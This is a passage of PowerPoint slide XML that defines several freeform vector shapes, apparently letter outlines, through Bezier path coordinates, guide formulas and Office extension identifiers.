                  <a:lnTo>
                    <a:pt x="172" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="188"/>
                    <a:pt x="76" y="172"/>
                    <a:pt x="76" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="5"/>
                    <a:pt x="73" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="159"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="76" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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1" name="Freeform 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D6EF96-0610-4FF8-9565-2BC7F50C379C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId83"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3317876" y="3363913"/>
              <a:ext cx="98425" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 233"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 208 w 233"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 233 w 233"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 213 w 233"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 233"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 233"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 233"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 233"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 35 w 233"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 233"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 67 w 233"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 85 w 233"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 149 w 233"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 233"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 233"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 233"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 149 w 233"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 149 w 233"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 233"/>
                <a:gd name="T37" fmla="*/ 184 h 222"/>
                <a:gd name="T38" fmla="*/ 85 w 233"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 233"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 149 w 233"/>
                <a:gd name="T43" fmla="*/ 11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3" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="208" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="219"/>
                    <a:pt x="233" y="219"/>
                    <a:pt x="233" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="213" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="23" y="59"/>
                    <a:pt x="35" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="59"/>
                    <a:pt x="56" y="55"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="57" y="32"/>
                    <a:pt x="67" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="85" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="30"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="222"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="175"/>
                    <a:pt x="130" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="89" y="192"/>
                    <a:pt x="85" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="149" y="11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2" name="Freeform 183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C769FFA-6617-4A49-A86A-E8A654AD8A5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId84"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3429001" y="3327400"/>
              <a:ext cx="87313" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 20 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 84 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 84 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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3" name="Freeform 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823D3C6D-EAF6-4F59-B67F-65AD92A7F532}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId85"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3532189" y="3327400"/>
              <a:ext cx="101600" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 239"/>
                <a:gd name="T1" fmla="*/ 30 h 304"/>
                <a:gd name="T2" fmla="*/ 220 w 239"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 239 w 239"/>
                <a:gd name="T5" fmla="*/ 15 h 304"/>
                <a:gd name="T6" fmla="*/ 220 w 239"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 160 w 239"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 140 w 239"/>
                <a:gd name="T11" fmla="*/ 15 h 304"/>
                <a:gd name="T12" fmla="*/ 160 w 239"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 173 w 239"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 173 w 239"/>
                <a:gd name="T17" fmla="*/ 131 h 304"/>
                <a:gd name="T18" fmla="*/ 67 w 239"/>
                <a:gd name="T19" fmla="*/ 131 h 304"/>
                <a:gd name="T20" fmla="*/ 67 w 239"/>
                <a:gd name="T21" fmla="*/ 30 h 304"/>
                <a:gd name="T22" fmla="*/ 79 w 239"/>
                <a:gd name="T23" fmla="*/ 30 h 304"/>
                <a:gd name="T24" fmla="*/ 99 w 239"/>
                <a:gd name="T25" fmla="*/ 15 h 304"/>
                <a:gd name="T26" fmla="*/ 79 w 239"/>
                <a:gd name="T27" fmla="*/ 0 h 304"/>
                <a:gd name="T28" fmla="*/ 20 w 239"/>
                <a:gd name="T29" fmla="*/ 0 h 304"/>
                <a:gd name="T30" fmla="*/ 0 w 239"/>
                <a:gd name="T31" fmla="*/ 15 h 304"/>
                <a:gd name="T32" fmla="*/ 20 w 239"/>
                <a:gd name="T33" fmla="*/ 30 h 304"/>
                <a:gd name="T34" fmla="*/ 33 w 239"/>
                <a:gd name="T35" fmla="*/ 30 h 304"/>
                <a:gd name="T36" fmla="*/ 33 w 239"/>
                <a:gd name="T37" fmla="*/ 274 h 304"/>
                <a:gd name="T38" fmla="*/ 20 w 239"/>
                <a:gd name="T39" fmla="*/ 274 h 304"/>
                <a:gd name="T40" fmla="*/ 0 w 239"/>
                <a:gd name="T41" fmla="*/ 289 h 304"/>
                <a:gd name="T42" fmla="*/ 20 w 239"/>
                <a:gd name="T43" fmla="*/ 304 h 304"/>
                <a:gd name="T44" fmla="*/ 79 w 239"/>
                <a:gd name="T45" fmla="*/ 304 h 304"/>
                <a:gd name="T46" fmla="*/ 99 w 239"/>
                <a:gd name="T47" fmla="*/ 289 h 304"/>
                <a:gd name="T48" fmla="*/ 79 w 239"/>
                <a:gd name="T49" fmla="*/ 274 h 304"/>
                <a:gd name="T50" fmla="*/ 67 w 239"/>
                <a:gd name="T51" fmla="*/ 274 h 304"/>
                <a:gd name="T52" fmla="*/ 67 w 239"/>
                <a:gd name="T53" fmla="*/ 161 h 304"/>
                <a:gd name="T54" fmla="*/ 173 w 239"/>
                <a:gd name="T55" fmla="*/ 161 h 304"/>
                <a:gd name="T56" fmla="*/ 173 w 239"/>
                <a:gd name="T57" fmla="*/ 274 h 304"/>
                <a:gd name="T58" fmla="*/ 160 w 239"/>
                <a:gd name="T59" fmla="*/ 274 h 304"/>
                <a:gd name="T60" fmla="*/ 140 w 239"/>
                <a:gd name="T61" fmla="*/ 289 h 304"/>
                <a:gd name="T62" fmla="*/ 160 w 239"/>
                <a:gd name="T63" fmla="*/ 304 h 304"/>
                <a:gd name="T64" fmla="*/ 220 w 239"/>
                <a:gd name="T65" fmla="*/ 304 h 304"/>
                <a:gd name="T66" fmla="*/ 239 w 239"/>
                <a:gd name="T67" fmla="*/ 289 h 304"/>
                <a:gd name="T68" fmla="*/ 220 w 239"/>
                <a:gd name="T69" fmla="*/ 274 h 304"/>
                <a:gd name="T70" fmla="*/ 207 w 239"/>
                <a:gd name="T71" fmla="*/ 274 h 304"/>
                <a:gd name="T72" fmla="*/ 207 w 239"/>
                <a:gd name="T73" fmla="*/ 3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9" h="304">
                  <a:moveTo>
                    <a:pt x="207" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="220" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="30"/>
                    <a:pt x="239" y="30"/>
                    <a:pt x="239" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="0"/>
                    <a:pt x="228" y="0"/>
                    <a:pt x="220" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="0"/>
                    <a:pt x="140" y="0"/>
                    <a:pt x="140" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="30"/>
                    <a:pt x="152" y="30"/>
                    <a:pt x="160" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="30"/>
                    <a:pt x="99" y="30"/>
                    <a:pt x="99" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="87" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="304"/>
                    <a:pt x="99" y="304"/>
                    <a:pt x="99" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="274"/>
                    <a:pt x="87" y="274"/>
                    <a:pt x="79" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="274"/>
                    <a:pt x="140" y="274"/>
                    <a:pt x="140" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="304"/>
                    <a:pt x="152" y="304"/>
                    <a:pt x="160" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="304"/>
                    <a:pt x="239" y="304"/>
                    <a:pt x="239" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="274"/>
                    <a:pt x="228" y="274"/>
                    <a:pt x="220" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207"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4" name="Freeform 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822771FF-FFC8-4B88-8176-64C996A1D2BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId86"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3649664" y="3363913"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="205" y="175"/>
                    <a:pt x="205" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="35" y="155"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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5" name="Freeform 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48BE5781-2E3E-4FE1-9292-4DE364884C7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId87"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3763964" y="3363913"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
